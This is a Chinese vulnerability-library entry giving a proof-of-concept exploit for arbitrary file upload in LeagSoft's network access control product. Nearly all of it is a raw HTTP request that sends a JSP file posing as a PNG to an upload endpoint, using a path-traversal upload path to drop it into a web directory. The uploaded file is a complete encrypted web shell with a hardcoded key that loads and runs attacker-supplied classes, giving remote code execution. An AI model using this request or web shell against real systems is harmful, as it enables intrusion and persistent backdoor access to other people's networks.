联软准入任意文件上传-棉花糖会员站

—
title: ‘联软准入-任意文件上传’
date: Sun, 13 Sep 2020 09:14:39 +0000
draft: false
tags: [‘白阁-漏洞库’]
—

#### POC

“`
POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx
… …

—————————–570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name=”input_localfile”; filename=”xxx.jsp”
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

—————————–570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name=”uploadpath”

../webapps/notifymsg/devreport/
—————————–570xxxxxxxxx6025274xxxxxxxx1–
“`![](/static/baige/04-厂商漏洞/联软/https://www.bylibrary.cn/wp-content/uploads/2020/09/12.png) ![](/static/baige/04-厂商漏洞/联软/https://www.bylibrary.cn/wp-content/uploads/2020/09/13.png)
“`

文章版权归作者所有，未经允许请勿转载。

THE END